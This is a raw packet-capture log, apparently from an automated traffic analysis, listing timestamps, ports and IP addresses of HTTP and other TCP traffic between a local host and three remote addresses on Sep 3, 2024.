Sep 3, 2024 17:13:21.535679102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.535753012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535764933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535774946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535815001 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.535815001 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.536003113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.536014080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.536025047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.536046028 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.536065102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.536077023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.536087990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.536098003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.536103010 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.536123991 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.536159039 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.551182032 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:21.556051970 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:21.598594904 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.598608971 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.598619938 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.598655939 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.598654032 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.598668098 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.598680973 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.598694086 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.598701000 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.598716974 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.598736048 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.598818064 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.598839045 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.598850965 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.598862886 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.598862886 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.598895073 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.598915100 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.598965883 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.598977089 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.598987103 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599018097 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599052906 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599054098 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599066973 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599078894 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599091053 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599102020 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599107981 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599114895 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599128962 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599138021 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599167109 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599194050 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599380016 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599394083 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599406004 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599423885 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599433899 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599436045 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599446058 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599453926 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599478960 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599548101 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599559069 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599570036 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599581957 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599592924 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599596977 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599605083 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599607944 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599617958 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599631071 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599649906 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599833012 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599849939 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599859953 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599872112 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599879980 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599884987 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599896908 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599901915 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599910975 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599921942 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599924088 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599935055 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.599967003 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.599989891 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.600116014 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.600127935 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.600138903 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.600157976 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.600208998 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.600459099 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.600470066 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.600486040 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.600502014 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.600517035 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.600517035 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.600534916 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.600553036 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.600856066 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.600867033 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.600877047 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.600888968 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.600898027 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.600914001 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.600930929 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.624752998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.624820948 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.624887943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.624903917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.624923944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.624937057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.624947071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.624947071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.624948978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.624957085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.624963045 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.624975920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.624980927 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.624993086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625030041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625030041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625060081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625072956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625086069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625098944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625123024 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625149965 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625446081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625459909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625471115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625484943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625498056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625502110 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625502110 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625510931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625524044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625533104 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625539064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625551939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625560999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625565052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625574112 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625597954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625612020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625616074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625616074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625627041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625638008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625639915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625658989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625659943 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625659943 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625674009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625684023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625684023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625689030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625701904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625710964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625729084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625729084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.625927925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.625982046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626029015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626040936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626049995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626063108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626074076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626081944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626085043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626099110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626106024 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626111984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626128912 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626138926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626162052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626180887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626192093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626200914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626238108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626238108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626271009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626282930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626292944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626302004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626318932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626324892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626324892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626328945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626338959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626351118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626367092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626367092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626425028 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626604080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626615047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626626968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626637936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626643896 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626657009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626679897 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626679897 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.626921892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626935005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626949072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626960039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626971006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.626998901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.627017975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.627043009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.627043009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.627063990 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.628825903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.628838062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.628848076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.628858089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.628869057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.628880978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.628891945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.628904104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.628911972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.628943920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.628943920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629443884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629457951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629468918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629482031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629497051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629498005 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629509926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629522085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629534006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629539013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629539013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629554987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629559040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629574060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629587889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629594088 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629594088 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629600048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629614115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629622936 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629626989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629640102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629667044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629667044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629695892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629704952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629734039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629745960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629757881 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629785061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629785061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629903078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629916906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629928112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629940033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629955053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629956007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.629977942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.629977942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630016088 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630325079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630378962 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630384922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630398035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630417109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630433083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630434990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630450964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630462885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630474091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630474091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630486012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630496979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630508900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630516052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630522966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630536079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630542040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630549908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630563974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630590916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630590916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630616903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630630016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630641937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630656004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630666018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630688906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630688906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630727053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630739927 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630750895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630763054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630774975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630775928 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630775928 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630795002 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630803108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630810022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630822897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630825043 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630825043 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630842924 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630844116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630861044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.630871058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630871058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.630942106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.631513119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.631529093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.631581068 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.631581068 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.721530914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721556902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721575022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721585989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721596956 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.721599102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721625090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.721625090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.721673965 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721684933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721688986 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.721698046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721720934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.721740007 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.721829891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721843004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721857071 CEST	80	49730	52.212.52.84	192.168.2.8
